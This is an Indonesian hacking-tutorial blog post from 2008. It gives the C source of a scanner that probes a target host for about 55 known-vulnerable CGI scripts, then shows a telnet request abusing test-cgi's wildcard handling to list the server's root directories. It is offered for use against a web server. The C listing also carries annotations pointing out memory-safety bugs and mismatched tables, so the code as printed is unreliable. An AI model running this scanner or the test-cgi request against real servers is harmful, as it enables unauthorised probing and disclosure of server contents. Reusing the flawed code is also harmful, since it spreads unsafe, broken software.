
Friday, October 17, 2008

Menjebol apache web server melalui test-cgi

Langsung saja, pertama yang perlu dipersiapkan oleh kita adalah scanner untuk melihat vulnerability dari web tersebut; di sini saya sertakan juga source programnya, dalam C.




#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define RMT_PORT 80
#define OXO 1
#define LOOK "200 OK" /* ALL PROBLES HAVE A SOLUTION */
#define OUT_FILE "DOuiD.cgi" /* The out-put file with the result */

/*
 * Entry point of a late-1990s style CGI path probe: for each of ~55
 * hard-coded /cgi-bin/ paths it opens a TCP connection to argv[1]:80,
 * writes a single request line and reports "found" whenever the reply
 * contains LOOK ("200 OK"). Results are appended to OUT_FILE.
 *
 * Notes for the reader:
 *  - Written without a return type on main (implicit int), i.e. pre-C99
 *    style; modern compilers reject or warn on this.
 *  - The request lines are not well-formed HTTP: the version field holds
 *    the literal text "SH" and the line is terminated with "\n\n" rather
 *    than CRLF. Such request lines are easy to spot in server logs.
 *  - Matching "200 OK" anywhere in the response means any server that
 *    answers unknown paths with a 200 page reports every probe as found.
 *  - Several memory-safety issues are flagged inline below (review notes);
 *    none of them is fixed here, the code is left as published.
 */
main(int argc, char *argv[])
{

struct sockaddr_in rmt_host;
struct hostent *rh;

FILE *f;
char buffer1[BUFSIZ];
char buffer2[BUFSIZ]; /* declared and zeroed but never read or written afterwards */
char *cgi[100]; /* You Can Change It Of Course */
char *name[100]; /* Here Also */

int sock,i=1; /* i starts at 1: slot 0 of both tables is left unused */

/* NOTE(review): 100 is a byte count, but cgi/name are arrays of 100
 * pointers (100 * sizeof(char *) bytes), so only the first part of each
 * table is cleared here. The unassigned tail of each table is therefore
 * not guaranteed to be NULL. */
memset(cgi,0,100);
memset(name,0,100);

memset(buffer1,0,BUFSIZ);
memset(buffer2,0,BUFSIZ);

/* THe CGI's List /cgi-bin/*.* */

cgi[1] = "GET /cgi-bin/phf SH \n\n";
cgi[2] = "GET /cgi-bin/test-cgi SH \n\n";
cgi[3] = "GET /cgi-bin/nph-test-cgi SH \n\n";
cgi[4] = "GET /cgi-bin/whois_raw.cgi SH \n\n";
cgi[5] = "GET /cgi-bin/Count.cgi SH \n\n";
cgi[6] = "GET /cgi-bin/search/tidfinder.cgi SH \n\n";
cgi[7] = "GET /cgi-bin/finger SH \n\n";
cgi[8] = "GET /cgi-bin/tablebuild.pl SH \n\n";
cgi[9] = "GET /cgi-bin/displayTC.pl SH \n\n";
cgi[10] = "GET /cgi-bin/uptime SH \n\n";
cgi[11] = "GET /cgi-bin/cvsweb/src/usr.bin/rdist/expand.c SH \n\n";
cgi[12] = "GET /cgi-bin/c_download.cgi SH \n\n";
cgi[13] = "GET /cgi-bin/program.pl SH \n\n";
cgi[14] = "GET /cgi-bin/ntitar.pl SH \n\n";
cgi[15] = "GET /cgi-bin/enter.cgi SH \n\n";
/* NOTE(review): slot 15 is assigned twice; the enter.cgi request above is
 * overwritten, while name[15] below still says "enter.cgi", so the
 * printed label for this probe does not match the request sent. The
 * index sequence is off by one from here on relative to the name table. */
cgi[15] = "GET /cgi-bin/query_string.cgi SH \n\n";
cgi[16] = "GET /cgi-bin/AT-generate.cgi SH \n\n";
cgi[17] = "GET /cgi-bin/test.html SH \n\n";
cgi[18] = "GET /cgi-bin/test-unix.html SH \n\n";
cgi[19] = "GET /cgi-bin/printenv SH \n\n";
cgi[20] = "GET /cgi-bin/dasp/fm_shell.asp SH \n\n";
cgi[21] = "GET /cgi-bin/wa SH \n\n";
cgi[22] = "GET /cgi-bin/visadmin.exe SH \n\n";
cgi[23] = "GET /cgi-bin/wguest.exe SH \n\n";
cgi[24] = "GET /cgi-bin/rguest.exe SH \n\n";
cgi[25] = "GET /cgi-bin/AnyForm2 SH \n\n";
cgi[26] = "GET /cgi-dos/args.bat SH \n\n";
cgi[27] = "GET /cgi-bin/perlshop.cgi SH \n\n";
cgi[28] = "GET /cgi-bin/edit.pl SH \n\n";
cgi[29] = "GET /cgi-bin/guestbook.cgi SH \n\n";
cgi[30] = "GET /cgi-bin/cgiwrap SH \n\n";
cgi[31] = "GET /cgi-bin/wrap SH \n\n";
cgi[32] = "GET /cgi-bin/environ.cgi SH \n\n";
cgi[33] = "GET /cgi-bin/classifieds.cgi SH \n\n";
cgi[34] = "GET /cgi-bin/textcounter.pl SH \n\n";
cgi[35] = "GET /cgi-win/uploader.exe SH \n\n";
cgi[36] = "GET /cgi-bin/nph-publish SH \n\n";
cgi[37] = "GET /cgi-bin/handler SH \n\n";
cgi[38] = "GET /cgi-bin/faxsurvey SH \n\n";
cgi[39] = "GET /cgi-bin/php.cgi SH \n\n";
cgi[40] = "GET /cgi-bin/wwwboard.pl SH \n\n";
cgi[41] = "GET /cgi-bin/websendmail SH \n\n";
cgi[42] = "GET /cgi-bin/rwwwshell.pl SH \n\n";
cgi[43] = "GET /cgi-bin/campas SH \n\n";
cgi[44] = "GET /cgi-bin/webdist.cgi SH \n\n";
cgi[45] = "GET /cgi-bin/aglimpse SH \n\n";
cgi[46] = "GET /cgi-bin/man.sh SH \n\n";
cgi[47] = "GET /cgi-bin/info2www SH \n\n";
cgi[48] = "GET /cgi-bin/jj SH \n\n";
cgi[49] = "GET /cgi-bin/files.pl SH \n\n";
cgi[50] = "GET /cgi-bin/maillist.pl SH \n\n";
cgi[51] = "GET /cgi-bin/filemail.pl SH \n\n";
cgi[52] = "GET /cgi-bin/bnbform.cgi SH \n\n";
cgi[53] = "GET /cgi-bin/survey.cgi SH \n\n";
cgi[54] = "GET /cgi-bin/glimpse SH \n\n";
cgi[55] = "GET /cgi-bin/www-sql SH \n\n"; /* never sent: the loop below stops at i < 55 */

/* CGi Description */
/* Human-readable label printed for each slot; must stay parallel to cgi[]. */

name[1] = "phf ";
name[2] = "test-cgi ";
name[3] = "nph-test-cgi ";
name[4] = "whois_raw.cgi ";
name[5] = "Count.cgi ";
name[6] = "tidfinder.cgi ";
name[7] = "finger ";
name[8] = "tablebuild.pl ";
name[9] = "displayTC.pl ";
name[10] = "uptime ";
name[11] = "expand.c ";
name[12] = "c_download.cgi ";
name[13] = "program.pl ";
name[14] = "ntitar.pl ";
name[15] = "enter.cgi ";
name[16] = "query_tring.cgi ";
name[17] = "test.html ";
name[18] = "test-unix.html ";
name[19] = "printenv ";
name[20] = "fm_shell.asp ";
name[21] = "wa ";
name[22] = "visadmin.exe ";
name[23] = "wguest.exe ";
name[24] = "rguest.exe ";
name[25] = "AnyForm2 ";
name[26] = "args.bat ";
name[27] = "perlshop.cgi ";
name[28] = "edit.pl ";
name[29] = "guestbook ";
name[30] = "cgiwrap ";
name[31] = "wrap ";
name[32] = "environ.cgi ";
name[33] = "classifieds.cgi ";
name[34] = "textcounter.pl ";
name[35] = "uploader.exe ";
name[36] = "nph-publish ";
name[37] = "handler ";
name[38] = "faxsurvey ";
name[39] = "php.cgi ";
name[40] = "wwwboard.pl ";
name[41] = "websendmail ";
name[42] = "rwwwshwll ";
name[43] = "campas ";
name[44] = "webdist.cgi ";
name[45] = "aglimpse ";
name[46] = "man.sh ";
name[47] = "info2www ";
name[48] = "jj ";
name[49] = "files.pl ";
name[50] = "maillist.pl ";
name[51] = "filemail.pl ";
name[52] = "bnbform.cgi ";
name[53] = "survey.cgi ";
name[54] = "slinpse ";
name[55] = "www-sql ";

/* The result file is opened (and created, mode "a") before the argument
 * check, so even a usage error leaves an empty OUT_FILE behind. */
if ((f=fopen(OUT_FILE,"a"))==NULL){
perror("fopen");
exit(OXO);
}

/* NOTE(review): the usage string contains no placeholder after %s; the
 * host argument name was probably lost when the listing was published. */
if (argc != 2){
fprintf(stderr,"Usage: %s \ncgiS.c By ZinC_Sh(C).\n",argv[0]);
exit(OXO);
}

/* Resolve once; only the first address (h_addr) is ever used. */
if ((rh=gethostbyname(argv[1])) == NULL){
perror("gethostbyname");
exit(OXO);
}

printf("\t\t\t\b\b------------------------\n");
printf("\t\t\t\b\b|\033[6;35m CGi Scaner V1.0.1 .- \033[0m|\n");
printf("\t\t\t\b\b|\033[6;35m By Scorpionbugs(C).- \033[0m|\n");
printf("\t\t\t\b\b------------------------\n\n");

/* One fresh TCP connection per table entry, sequentially.
 * Off-by-one: i runs 1..54, so entry 55 is never probed. */
while (i < 55)
{
if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1){
perror("Socket");
exit(OXO);
}

bzero(&(rmt_host.sin_zero),8);
rmt_host.sin_family = AF_INET;
rmt_host.sin_addr = *((struct in_addr *)rh->h_addr);
rmt_host.sin_port = htons(RMT_PORT);

/* Any connection failure aborts the whole run; the open FILE is not
 * flushed/closed explicitly here (exit() flushes stdio). */
if (connect(sock,(struct sockaddr *) &rmt_host ,sizeof(rmt_host)) != 0){
perror("connect");
exit(OXO);
}

printf("LookinG For %s\b\b\b\bCGI in /cgi-bin/ :",name[i]);

/* NOTE(review): sizeof(cgi) is the size of the pointer table
 * (100 * sizeof(char *)), not the length of the string cgi[i] points
 * to, so this reads far past the end of a short string literal —
 * undefined behaviour — and pushes whatever follows it in memory onto
 * the wire. strlen(cgi[i]) is what was meant. */
send(sock,cgi[i],sizeof(cgi),0);
/* NOTE(review): return value ignored; buffer1 is zeroed only once before
 * the loop and recv() does not NUL-terminate, so a reply that fills all
 * BUFSIZ bytes leaves strstr() below with no terminator, and a shorter
 * reply is matched against leftovers of the previous iteration. */
recv(sock,buffer1,sizeof(buffer1),0);

/* "found" == the literal "200 OK" appears anywhere in whatever was read. */
if((strstr(buffer1,LOOK)) != 0){
printf("\t\033[1;32mCGI FounD !!!\033[0m\n");
fputs("FounD !!!",f);
fputs(cgi[i],f); /* the request string itself carries the trailing "\n\n" */
} else {
printf("\tCGI NoT FounD.\n");
}

close(sock);
i++;
}

printf("\nKapUt !\nMay The Poula KApribekou Be With You... (ZinC_Sh).\n");
printf("The Results Will Be Found In THe DOuiD.cgi File.\n");

/* fclose() return value is not checked; a failed flush of OUT_FILE
 * would go unnoticed. */
fclose(f);
return 0;
}


cara compile : gcc cgis.c -o cgis

kalo udah dikompilasi, trus sekarang waktunya hack dengan sintaks

#cgis 10.1.xx.xx
looking for phf CGI in /cgi-bin/ : CGI Not Found
looking for test-cgi CGI in /cgi-bin/ : CGI Found !!!!
bla bla bla
bla bla
bla

dan hasil scannya disimpan di file DOuiD.cgi; di file ini sih cuma ngasih tahu aja hasil proses scan tersebut
nah di baris kedua kita bisa lihat ternyata cgi-bin/test-cgi ada dan open dalam web tersebut

selanjutnya tinggal kita telnet ke 10.1.xx.xx melalui port 80

#telnet 10.1.xx.xx 80
Trying 10.1.xx.xx
Connected to 10.1.xx.xx Escape character is '^}'
GET /cgin-bin/test-cgi?/* report:argc is 1. argv is /\*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root
/sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

nah di query_string kita bisa lihat seluruh directory; selanjutnya terserah anda, saya menyarankan jangan mengubah atau mengganggu
isi directory tersebut. selamat mencoba
